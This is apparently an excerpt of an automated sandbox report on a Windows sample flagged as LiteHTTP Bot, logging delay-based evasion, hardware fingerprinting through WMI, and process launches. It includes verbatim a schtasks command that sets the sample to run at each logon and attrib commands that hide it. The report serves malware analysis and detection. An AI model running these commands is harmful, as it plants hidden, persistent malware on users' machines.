                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -34221s >= -30000s
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -34096s >= -30000s
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -33971s >= -30000s
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -33833s >= -30000s
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -33668s >= -30000s
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -33506s >= -30000s
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -33388s >= -30000s
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -33281s >= -30000s
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -33173s >= -30000s
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -33033s >= -30000s
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -32908s >= -30000s
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -32783s >= -30000s
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -32658s >= -30000s
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -32533s >= -30000s
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -32408s >= -30000s
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 39830Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 39705Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 39580Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 39455Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 39330Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 39205Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 39094Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 38984Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 38846Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 38734Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 38512Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 38392Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 38145Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 37689Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 37392Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 36984Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 36873Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 36767Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 36642Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 36517Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 36392Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 36267Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 36142Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 36017Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 35892Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 35767Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 35642Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 35517Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 35392Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 35267Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 35142Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 35017Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 34892Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 34752Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 34627Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 34455Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 34300Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 33731Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 33622Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 33514Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 33406Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 33299Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 33174Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 33049Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 32924Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 32799Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 32674Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 32549Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 32424Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 32299Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 32174Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 32049Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 31924Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 31799Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 31674Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 39830Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 39705Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 39580Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 39455Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 39330Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 39205Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 39080Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 38955Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 38830Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 38705Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 38580Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 38455Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 38330Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 38205Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 38080Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 37152Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 36833Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 36705Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 36580Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 36455Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 36330Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 36205Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 36080Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 35955Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 35830Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 35705Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 35580Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 35455Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 35330Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 35205Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 35080Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 34955Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 34830Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 34705Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 34580Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 34398Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 34276Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 34081Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 33686Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 33361Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 33235Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 33098Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 32942Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 32814Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 32689Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 32564Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 32439Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 32314Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 32189Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 32064Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 31939Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 31814Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 39830
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 39705
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 39580
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 39455
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 39330
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 39205
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 39080
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 38955
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 38830
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 38705
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 38580
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 38455
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 38330
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 38205
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 38080
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 37908
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 37782
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 37663
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 37449
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 37283
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 37156
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 36779
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 36533
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 36339
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 36228
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 36111
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 35986
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 35861
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 35721
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 35596
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 35471
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 35346
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 35221
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 35096
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 34971
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 34846
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 34721
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 34596
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 34471
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 34346
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 34221
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 34096
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 33971
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 33833
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 33668
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 33506
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 33388
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 33281
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 33173
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 33033
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 32908
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 32783
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 32658
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 32533
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeThread delayed: delay time: 32408
                            Source: 3u8A2xjbBT.exe, 00000000.00000002.3716578123.000000000BA67000.00000004.00000020.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 0000000F.00000002.3716378962.000000000A222000.00000004.00000020.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000010.00000002.3715570746.000000000A86C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeMemory allocated: page read and write | page guardJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /Query /TN "3u8A2xjbBT"Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /sc onlogon /tn "3u8A2xjbBT" /tr "C:\Users\user\Desktop\3u8A2xjbBT.exe"Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /Query /TN "3u8A2xjbBT"Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"Jump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /Query /TN "3u8A2xjbBT"
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: unknown unknown
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: unknown unknown
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeQueries volume information: C:\Users\user\Desktop\3u8A2xjbBT.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeQueries volume information: C:\Users\user\Desktop\3u8A2xjbBT.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeQueries volume information: C:\Users\user\Desktop\3u8A2xjbBT.exe VolumeInformation
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                            Stealing of Sensitive Information

                            barindex
                            Yara detected LiteHTTP Bot
                            Source: Yara matchFile source: dump.pcap, type: PCAP
                            Source: Yara matchFile source: 16.2.3u8A2xjbBT.exe.3039c04.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000002.3711597312.0000000003524000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.3711597312.0000000003638000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.3711404452.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.3711404452.0000000002D22000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.3711597312.0000000003536000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.3711597312.00000000033B3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.3711597312.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.3711597312.0000000003688000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.3711597312.00000000036B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.3711404452.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.3711597312.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.3711404452.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.3711218629.0000000003132000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.3711218629.0000000003037000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.3711597312.000000000347E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.3711218629.0000000003089000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.3711218629.000000000316D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.3711597312.0000000003554000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.3711404452.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: 3u8A2xjbBT.exe PID: 6464, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: 3u8A2xjbBT.exe PID: 2908, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: 3u8A2xjbBT.exe PID: 4704, type: MEMORYSTR

                            Remote Access Functionality

                            barindex
                            Yara detected LiteHTTP Bot
                            Source: Yara matchFile source: dump.pcap, type: PCAP
